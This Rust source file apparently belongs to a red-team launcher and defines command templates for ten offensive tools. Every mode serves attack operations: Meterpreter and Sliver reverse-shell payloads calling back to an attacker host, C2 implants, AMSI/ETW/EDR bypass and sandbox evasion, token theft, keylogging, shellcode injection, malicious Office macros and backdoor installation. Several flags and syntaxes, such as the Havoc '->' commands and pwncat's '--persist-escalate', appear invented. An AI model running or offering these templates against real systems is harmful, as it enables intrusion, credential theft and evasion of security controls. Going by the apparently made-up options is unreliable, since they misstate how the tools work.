use crate::tools::types::{Tool, Mode, InputKind, OutputFormat};

pub const TOOLS: &[Tool] = &[
    Tool {
        name: "MSFVenom",
        binary: "msfvenom",
        description: "Metasploit payload generator — the Swiss Army knife of payload creation.",
        modes: &[
            Mode {
                name: "Windows Reverse TCP",
                cmd_template: r#"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -f exe -o {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Linux Reverse TCP",
                cmd_template: r#"msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -f elf -o {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "MacOS Reverse TCP",
                cmd_template: r#"msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -f macho -o {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Web Payload PHP",
                cmd_template: r#"msfvenom -p php/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -f raw -o {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Web Payload ASPX",
                cmd_template: r#"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -f aspx -o {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Web Payload JSP",
                cmd_template: r#"msfvenom -p java/jsp_shell_reverse_tcp LHOST={lhost} LPORT={lport} -f raw -o {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Python Payload",
                cmd_template: r#"msfvenom -p cmd/unix/reverse_python LHOST={lhost} LPORT={lport} -f raw -o {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Android Payload",
                cmd_template: r#"msfvenom -p android/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -o {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Encoded Payload",
                cmd_template: r#"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -e x64/xor -i 5 -f exe -o {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "List Formats",
                cmd_template: r#"msfvenom --list formats > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "Sliver C2",
        binary: "sliver-server",
        description: "Modern cross-platform C2 framework with advanced implant generation.",
        modes: &[
            Mode {
                name: "Generate Implant",
                cmd_template: r#"sliver-server generate --mtls {lhost}:{lport} --os windows --arch amd64 --save {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "HTTPS Implant",
                cmd_template: r#"sliver-server generate --http https://{lhost} --os linux --arch amd64 --save {output_file}"#,
                inputs: &[InputKind::Lhost],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "DNS Implant",
                cmd_template: r#"sliver-server generate --dns {domain} --os macos --arch arm64 --save {output_file}"#,
                inputs: &[InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Staged Payload",
                cmd_template: r#"sliver-server generate stager --lhost {lhost} --lport {lport} --format csharp --save {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Shellcode",
                cmd_template: r#"sliver-server generate --http {lhost}:{lport} --format shellcode --save {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "raw",
            },
            Mode {
                name: "Service Binary",
                cmd_template: r#"sliver-server generate --mtls {lhost}:{lport} --format service --save {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Shared Library",
                cmd_template: r#"sliver-server generate --mtls {lhost}:{lport} --format shared --save {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "WireGuard",
                cmd_template: r#"sliver-server generate --wg {lhost}:{lport} --os windows --arch amd64 --save {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Profile Build",
                cmd_template: r#"sliver-server profiles new --mtls {lhost} --http {domain} --format exe,shellcode {profile_name} > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Domain, InputKind::Custom("Profile Name", "profile_name")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Implant List",
                cmd_template: r#"sliver-server implants > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "Havoc C2",
        binary: "./havoc",
        description: "Modern C2 framework with Demon agent and advanced evasion.",
        modes: &[
            Mode {
                name: "Generate Demon",
                cmd_template: r#"./havoc client -> payload generate --profile {profile} --arch x64 --format exe --output {output_file}"#,
                inputs: &[InputKind::Custom("Profile", "profile")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Shellcode Build",
                cmd_template: r#"./havoc client -> payload generate --profile {profile} --arch x64 --format shellcode --output {output_file}"#,
                inputs: &[InputKind::Custom("Profile", "profile")],
                output_format: OutputFormat::Raw,
                file_ext: "raw",
            },
            Mode {
                name: "DLL Agent",
                cmd_template: r#"./havoc client -> payload generate --profile {profile} --arch x64 --format dll --output {output_file}"#,
                inputs: &[InputKind::Custom("Profile", "profile")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Service Binary",
                cmd_template: r#"./havoc client -> payload generate --profile {profile} --arch x64 --format service-exe --output {output_file}"#,
                inputs: &[InputKind::Custom("Profile", "profile")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "PowerShell",
                cmd_template: r#"./havoc client -> payload generate --profile {profile} --arch x64 --format powershell --output {output_file}"#,
                inputs: &[InputKind::Custom("Profile", "profile")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Custom Listener",
                cmd_template: r#"./havoc client -> listener create --name {name} --protocol http --hosts {lhost} --port {lport} --uris /api/v1,/data > {output_file}"#,
                inputs: &[InputKind::Custom("Name", "name"), InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Sleep Mask",
                cmd_template: r#"./havoc client -> payload generate --profile {profile} --sleep-obf --format exe --output {output_file}"#,
                inputs: &[InputKind::Custom("Profile", "profile")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Token Steal",
                cmd_template: r#"./havoc client -> token steal {pid} > {output_file}"#,
                inputs: &[InputKind::Custom("Pid", "pid")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Inline Execute",
                cmd_template: r#"./havoc client -> shellcode inject {pid} {shellcode_file} > {output_file}"#,
                inputs: &[InputKind::Custom("Pid", "pid"), InputKind::Custom("Shellcode File", "shellcode_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Evasion",
                cmd_template: r#"./havoc client -> payload generate --profile {profile} --arch x64 --format exe --sleep-obf --export {output_file}"#,
                inputs: &[InputKind::Custom("Profile", "profile")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
        ],
    },
    Tool {
        name: "Mythic",
        binary: "mythic-cli",
        description: "Collaborative red teaming platform with multi-agent support.",
        modes: &[
            Mode {
                name: "Apollo Agent",
                cmd_template: r#"mythic-cli install github SpecterOps/apollo && mythic-cli start apollo > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Poseidon Agent",
                cmd_template: r#"mythic-cli install github SpecterOps/poseidon && mythic-cli start poseidon > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Payload Create",
                cmd_template: r#"mythic-cli payload create --type apollo --c2-profile http --callback-host {lhost} > {output_file}"#,
                inputs: &[InputKind::Lhost],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Custom C2",
                cmd_template: r#"mythic-cli c2 create --type http --callback-host {lhost} --callback-port {lport} --get-uri /api/data > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Callback Config",
                cmd_template: r#"mythic-cli payload create --type poseidon --callback-interval 10 --callback-jitter 20 > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "File Upload",
                cmd_template: r#"mythic-cli file upload --file {local} --remote {remote_path} > {output_file}"#,
                inputs: &[InputKind::Custom("Local", "local"), InputKind::Custom("Remote Path", "remote_path")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Screenshot",
                cmd_template: r#"mythic-cli action screenshot --payload {payload_id} > {output_file}"#,
                inputs: &[InputKind::Custom("Payload Id", "payload_id")],
                output_format: OutputFormat::Raw,
                file_ext: "png",
            },
            Mode {
                name: "Token Ops",
                cmd_template: r#"mythic-cli action tokens --payload {payload_id} --action steal > {output_file}"#,
                inputs: &[InputKind::Custom("Payload Id", "payload_id")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Keylog Start",
                cmd_template: r#"mythic-cli action keylog --payload {payload_id} --action start > {output_file}"#,
                inputs: &[InputKind::Custom("Payload Id", "payload_id")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Deploy",
                cmd_template: r#"mythic-cli payload create --type apollo --c2-profile http,dns --callback-host {lhost} --format exe,shellcode > {output_file}"#,
                inputs: &[InputKind::Lhost],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "MacroPack",
        binary: "macro_pack.exe",
        description: "Generate obfuscated macros, VBS, and payloads for Office documents.",
        modes: &[
            Mode {
                name: "VBA Macro",
                cmd_template: r#"macro_pack.exe -t {payload_file} -o -G {output_file}"#,
                inputs: &[InputKind::Custom("Payload File", "payload_file")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "XLM Macro",
                cmd_template: r#"macro_pack.exe -t {payload_file} --xlm -o -G {output_file}"#,
                inputs: &[InputKind::Custom("Payload File", "payload_file")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "DDE Attack",
                cmd_template: r#"macro_pack.exe --dde -t {payload_file} -G {output_file}"#,
                inputs: &[InputKind::Custom("Payload File", "payload_file")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Template Injection",
                cmd_template: r#"macro_pack.exe -t {payload_file} --template -G {output_file}"#,
                inputs: &[InputKind::Custom("Payload File", "payload_file")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "HTA Payload",
                cmd_template: r#"macro_pack.exe -t {payload_file} --hta -G {output_file}"#,
                inputs: &[InputKind::Custom("Payload File", "payload_file")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "SCT File",
                cmd_template: r#"macro_pack.exe -t {payload_file} --sct -G {output_file}"#,
                inputs: &[InputKind::Custom("Payload File", "payload_file")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Obfuscation",
                cmd_template: r#"macro_pack.exe -t {payload_file} --obfuscate -G {output_file}"#,
                inputs: &[InputKind::Custom("Payload File", "payload_file")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Embed File",
                cmd_template: r#"macro_pack.exe -t {payload_file} --embed {embedded} -G {output_file}"#,
                inputs: &[InputKind::Custom("Payload File", "payload_file"), InputKind::Custom("Embedded", "embedded")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Shortcut LNK",
                cmd_template: r#"macro_pack.exe -t {payload_file} --shortcut -G {output_file}"#,
                inputs: &[InputKind::Custom("Payload File", "payload_file")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Full Evasion",
                cmd_template: r#"macro_pack.exe -t {payload_file} --xlm --obfuscate --embed {stage2} -G {output_file}"#,
                inputs: &[InputKind::Custom("Payload File", "payload_file"), InputKind::Custom("Stage2", "stage2")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
        ],
    },
    Tool {
        name: "Donut",
        binary: "donut",
        description: "Convert .NET assemblies to position-independent shellcode.",
        modes: &[
            Mode {
                name: "Basic Generation",
                cmd_template: r#"donut -f {assembly}.exe -o {output_file}"#,
                inputs: &[InputKind::Custom("Assembly", "assembly")],
                output_format: OutputFormat::Raw,
                file_ext: "raw",
            },
            Mode {
                name: "Class/Method",
                cmd_template: r#"donut -f {assembly}.dll -c {class} -m {method} -o {output_file}"#,
                inputs: &[InputKind::Custom("Assembly", "assembly"), InputKind::Custom("Class", "class"), InputKind::Custom("Method", "method")],
                output_format: OutputFormat::Raw,
                file_ext: "raw",
            },
            Mode {
                name: "Parameters",
                cmd_template: r#"donut -f {assembly}.exe -p '{parameters}' -o {output_file}"#,
                inputs: &[InputKind::Custom("Assembly", "assembly"), InputKind::Custom("Parameters", "parameters")],
                output_format: OutputFormat::Raw,
                file_ext: "raw",
            },
            Mode {
                name: "Entropy Control",
                cmd_template: r#"donut -f {assembly}.exe -e 2 -o {output_file}"#,
                inputs: &[InputKind::Custom("Assembly", "assembly")],
                output_format: OutputFormat::Raw,
                file_ext: "raw",
            },
            Mode {
                name: "Runtime Select",
                cmd_template: r#"donut -f {assembly}.exe -r {runtime_dll} -o {output_file}"#,
                inputs: &[InputKind::Custom("Assembly", "assembly"), InputKind::Custom("Runtime Dll", "runtime_dll")],
                output_format: OutputFormat::Raw,
                file_ext: "raw",
            },
            Mode {
                name: "AMSI Bypass",
                cmd_template: r#"donut -f {assembly}.exe -a 1 -o {output_file}"#,
                inputs: &[InputKind::Custom("Assembly", "assembly")],
                output_format: OutputFormat::Raw,
                file_ext: "raw",
            },
            Mode {
                name: "WLDP Bypass",
                cmd_template: r#"donut -f {assembly}.exe -y 1 -o {output_file}"#,
                inputs: &[InputKind::Custom("Assembly", "assembly")],
                output_format: OutputFormat::Raw,
                file_ext: "raw",
            },
            Mode {
                name: "Exit Mode",
                cmd_template: r#"donut -f {assembly}.exe -x 1 -o {output_file}"#,
                inputs: &[InputKind::Custom("Assembly", "assembly")],
                output_format: OutputFormat::Raw,
                file_ext: "raw",
            },
            Mode {
                name: "Compression",
                cmd_template: r#"donut -f {assembly}.exe -z 2 -o {output_file}"#,
                inputs: &[InputKind::Custom("Assembly", "assembly")],
                output_format: OutputFormat::Raw,
                file_ext: "raw",
            },
            Mode {
                name: "Full Evasion",
                cmd_template: r#"donut -f {assembly}.exe -a 1 -y 1 -e 3 -z 2 -o {output_file}"#,
                inputs: &[InputKind::Custom("Assembly", "assembly")],
                output_format: OutputFormat::Raw,
                file_ext: "raw",
            },
        ],
    },
    Tool {
        name: "ScareCrow",
        binary: "ScareCrow",
        description: "EDR evasion payload creation framework with side-loading.",
        modes: &[
            Mode {
                name: "Binary Loader",
                cmd_template: r#"ScareCrow -I {shellcode}.bin -domain {domain} -delivery binary -o {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Control Loader",
                cmd_template: r#"ScareCrow -I {shellcode}.bin -domain {domain} -delivery control -o {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Excel Loader",
                cmd_template: r#"ScareCrow -I {shellcode}.bin -domain {domain} -delivery excel -o {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "MSI Loader",
                cmd_template: r#"ScareCrow -I {shellcode}.bin -domain {domain} -delivery msi -o {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "DLL Loader",
                cmd_template: r#"ScareCrow -I {shellcode}.bin -domain {domain} -delivery dll -o {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "EDR Unhook",
                cmd_template: r#"ScareCrow -I {shellcode}.bin -domain {domain} -delivery binary -unhook -o {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Custom Process",
                cmd_template: r#"ScareCrow -I {shellcode}.bin -domain {domain} -injection {process} -o {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Domain, InputKind::Custom("Process", "process")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Syscall Obf",
                cmd_template: r#"ScareCrow -I {shellcode}.bin -domain {domain} -syscall zww -o {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Sandbox Evasion",
                cmd_template: r#"ScareCrow -I {shellcode}.bin -domain {domain} -sandbox -o {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Full Evasion",
                cmd_template: r#"ScareCrow -I {shellcode}.bin -domain {domain} -delivery binary -unhook -sandbox -syscall direct -o {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
        ],
    },
    Tool {
        name: "SharpShooter",
        binary: "SharpShooter.py",
        description: "Payload delivery framework for HTA, JS, VBS, and VBA.",
        modes: &[
            Mode {
                name: "HTA Payload",
                cmd_template: r#"SharpShooter.py --stageless --dotnetver 4 --payload hta --output {output_file} --rawsc {shellcode}.bin"#,
                inputs: &[InputKind::Payload],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "JS Payload",
                cmd_template: r#"SharpShooter.py --stageless --dotnetver 4 --payload js --output {output_file} --rawsc {shellcode}.bin"#,
                inputs: &[InputKind::Payload],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "VBS Payload",
                cmd_template: r#"SharpShooter.py --stageless --dotnetver 4 --payload vbs --output {output_file} --rawsc {shellcode}.bin"#,
                inputs: &[InputKind::Payload],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "VBA Payload",
                cmd_template: r#"SharpShooter.py --stageless --dotnetver 4 --payload vba --output {output_file} --rawsc {shellcode}.bin"#,
                inputs: &[InputKind::Payload],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Staged Delivery",
                cmd_template: r#"SharpShooter.py --payload js --output {output_file} --web {url} --rawsc {shellcode}.bin"#,
                inputs: &[InputKind::Url, InputKind::Payload],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Anti-Sandbox",
                cmd_template: r#"SharpShooter.py --stageless --payload js --sandbox --output {output_file} --rawsc {shellcode}.bin"#,
                inputs: &[InputKind::Payload],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "AMSI Bypass",
                cmd_template: r#"SharpShooter.py --stageless --payload js --amsi --output {output_file} --rawsc {shellcode}.bin"#,
                inputs: &[InputKind::Payload],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Custom Key",
                cmd_template: r#"SharpShooter.py --stageless --payload js --output {output_file} --rawsc {shellcode}.bin --key {key}"#,
                inputs: &[InputKind::Payload, InputKind::Custom("Key", "key")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "HTML Smuggling",
                cmd_template: r#"SharpShooter.py --stageless --payload js --smuggle --output {output_file} --rawsc {shellcode}.bin"#,
                inputs: &[InputKind::Payload],
                output_format: OutputFormat::Raw,
                file_ext: "html",
            },
            Mode {
                name: "Full Evasion",
                cmd_template: r#"SharpShooter.py --stageless --payload js --sandbox --amsi --smuggle --output {output_file} --rawsc {shellcode}.bin"#,
                inputs: &[InputKind::Payload],
                output_format: OutputFormat::Raw,
                file_ext: "html",
            },
        ],
    },
    Tool {
        name: "Unicorn",
        binary: "unicorn.py",
        description: "PowerShell downgrade attack and shellcode injection tool.",
        modes: &[
            Mode {
                name: "Reverse Shell",
                cmd_template: r#"python3 /opt/tsec/tools/unicorn.py reverse_tcp {lhost} {lport} powershell > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Macro Attack",
                cmd_template: r#"python3 /opt/tsec/tools/unicorn.py reverse_tcp {lhost} {lport} macro > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "HTA Delivery",
                cmd_template: r#"python3 /opt/tsec/tools/unicorn.py reverse_tcp {lhost} {lport} hta > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Certutil",
                cmd_template: r#"python3 /opt/tsec/tools/unicorn.py reverse_tcp {lhost} {lport} certutil > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Custom Shellcode",
                cmd_template: r#"python3 /opt/tsec/tools/unicorn.py {shellcode_file} powershell > {output_file}"#,
                inputs: &[InputKind::Custom("Shellcode File", "shellcode_file")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Custom Encoding",
                cmd_template: r#"python3 /opt/tsec/tools/unicorn.py reverse_tcp {lhost} {lport} powershell 5 > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "AMSI Bypass",
                cmd_template: r#"python3 /opt/tsec/tools/unicorn.py reverse_tcp {lhost} {lport} powershell --amsi > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "ETW Bypass",
                cmd_template: r#"python3 /opt/tsec/tools/unicorn.py reverse_tcp {lhost} {lport} powershell --etw > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Full Evasion",
                cmd_template: r#"python3 /opt/tsec/tools/unicorn.py reverse_tcp {lhost} {lport} powershell --amsi --etw > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Macro + HTA",
                cmd_template: r#"python3 /opt/tsec/tools/unicorn.py reverse_tcp {lhost} {lport} macro_hta > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "pwncat",
        binary: "pwncat-cs",
        description: "Sophisticated post-exploitation platform and bind/reverse shell handler.",
        modes: &[
            Mode {
                name: "Listener",
                cmd_template: r#"pwncat-cs -lp {lport} > {output_file}"#,
                inputs: &[InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Connect Mode",
                cmd_template: r#"pwncat-cs {target}:{port} > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Ports],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SSL Listener",
                cmd_template: r#"pwncat-cs -lp {lport} --ssl > {output_file}"#,
                inputs: &[InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SSH Pivot",
                cmd_template: r#"pwncat-cs -lp {lport} --ssl -m linux --identity {key} {user}@{target} > {output_file}"#,
                inputs: &[InputKind::Lport, InputKind::Custom("Key", "key"), InputKind::Username, InputKind::Target],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Backdoor Install",
                cmd_template: r#"pwncat-cs -lp {lport} --install {backdoor_type} > {output_file}"#,
                inputs: &[InputKind::Lport, InputKind::Custom("Backdoor Type", "backdoor_type")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Auto Escalate",
                cmd_template: r#"pwncat-cs -lp {lport} --persist-escalate > {output_file}"#,
                inputs: &[InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Windows Shell",
                cmd_template: r#"pwncat-cs -lp {lport} -m windows > {output_file}"#,
                inputs: &[InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "File Upload",
                cmd_template: r#"(pwncat) upload {local_file} {remote_path}"#,
                inputs: &[InputKind::Custom("Local File", "local_file"), InputKind::Custom("Remote Path", "remote_path")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "File Download",
                cmd_template: r#"(pwncat) download {remote_file} {local_path}"#,
                inputs: &[InputKind::Custom("Remote File", "remote_file"), InputKind::Custom("Local Path", "local_path")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Full Session",
                cmd_template: r#"pwncat-cs -lp {lport} --ssl -m linux --persist-escalate --backdoor > {output_file}"#,
                inputs: &[InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
];
